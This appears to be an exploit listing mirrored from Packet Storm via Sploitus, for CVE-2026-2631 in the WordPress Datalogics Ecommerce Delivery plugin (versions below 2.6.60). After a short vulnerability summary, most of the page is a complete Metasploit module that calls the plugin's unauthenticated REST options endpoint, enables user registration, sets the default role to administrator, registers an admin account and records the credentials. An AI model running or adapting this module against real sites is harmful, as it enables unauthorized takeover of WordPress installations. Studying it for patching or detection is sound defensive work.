Share
## https://sploitus.com/exploit?id=PACKETSTORM:218136
===============================================================================================================================================================================
    | # Title     : WordPress Datalogics Ecommerce Delivery Plugin < 2.6.60 Privilege Escalation via Insecure Configuration Manipulation Leading to Admin Account Creation        |
    | # Author    : indoushka                                                                                                                                                     |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                                                              |
    | # Vendor    : https://fr.wordpress.org/plugins/datalogics/                                                                                                                  |
    ================================================================================================================================================================================
    
    [+] Summary    : A critical vulnerability exists in the Datalogics Ecommerce Delivery WordPress plugin versions prior to 2.6.60, allowing unauthenticated attackers to modify 
                     sensitive plugin and WordPress configuration options due to insufficient access control in the exposed REST API.
                     The flaw enables attackers to enable user registration, change the default user role to administrator, and leverage the public registration mechanism to create an administrative account. 
    				 This results in a full privilege escalation chain, ultimately leading to complete takeover of affected WordPress installations.
                     The issue is caused by improper authentication and authorization checks on configuration update endpoints, exposing critical administrative functionality to unauthenticated users.
    				 
    [+] POC   :  
    
    ##
    # CVE-2026-2631
    # Datalogics Ecommerce Delivery < 2.6.60 Privilege Escalation
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HTTP::Wordpress
      include Msf::Auxiliary::Report
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'WordPress Datalogics Ecommerce Delivery Privilege Escalation',
            'Description' => %q{
              This module exploits an unauthenticated privilege escalation vulnerability
              in the Datalogics Ecommerce Delivery plugin (< 2.6.60).
    
              The API allows insecure modification of WordPress options without authentication,
              enabling attackers to:
    
              1. Enable user registration
              2. Set default role to administrator
              3. Create a new admin account via public registration flow
            },
            'Author' => [
              'indoushka'
            ],
            'License' => MSF_LICENSE,
            'References' => [
              [ 'CVE', 'CVE-2026-2631' ]
            ],
            'DisclosureDate' => '2026-01-01',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [CONFIG_CHANGES]
            }
          )
        )
    
        register_options([
          OptString.new('USERNAME', [true, 'Admin username', 'admin_poc']),
          OptString.new('EMAIL', [true, 'Admin email', 'admin@poc.local']),
          OptString.new('PASSWORD', [true, 'Admin password', 'P@ssw0rd123']),
          OptString.new('TARGETURI', [true, 'WordPress base path', '/'])
        ])
      end
    
      def run_host(ip)
        @uri = normalize_uri(target_uri.path)
    
        print_status("Target: #{rhost}:#{rport}#{@uri}")
    
        unless enable_registration
          print_error("Failed to enable registration")
          return
        end
    
        unless set_default_role
          print_error("Failed to set default role")
          return
        end
    
        if register_admin
          print_good("Admin account created successfully!")
    
          report_cred(
            ip: rhost,
            port: rport,
            service_name: 'wordpress',
            user: datastore['USERNAME'],
            password: datastore['PASSWORD'],
            proof: "Admin created via Datalogics exploit"
          )
        else
          print_error("Exploitation failed")
        end
      end
    
      def enable_registration
        uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')
    
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri,
          'ctype' => 'application/json',
          'data' => {
            'users_can_register' => 1
          }.to_json
        })
    
        res && res.code == 200
      end
    
      def set_default_role
        uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')
    
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri,
          'ctype' => 'application/json',
          'data' => {
            'default_role' => 'administrator'
          }.to_json
        })
    
        res && res.code == 200
      end
    
      def register_admin
        uri = normalize_uri(@uri, 'wp-login.php?action=register')
    
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri,
          'ctype' => 'application/x-www-form-urlencoded',
          'vars_post' => {
            'user_login' => datastore['USERNAME'],
            'user_email' => datastore['EMAIL'],
            'user_pass' => datastore['PASSWORD']
          }
        })
    
        res && res.code == 200
      end
    
      def report_cred(opts)
        service_data = {
          address: opts[:ip],
          port: opts[:port],
          service_name: opts[:service_name],
          protocol: 'tcp'
        }
    
        credential_data = {
          origin_type: :service,
          module_fullname: self.fullname,
          username: opts[:user],
          private_data: opts[:password],
          private_type: :password,
          proof: opts[:proof]
        }.merge(service_data)
    
        create_credential_login({
          core: create_credential(credential_data),
          status: Metasploit::Model::Login::Status::SUCCESSFUL
        })
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================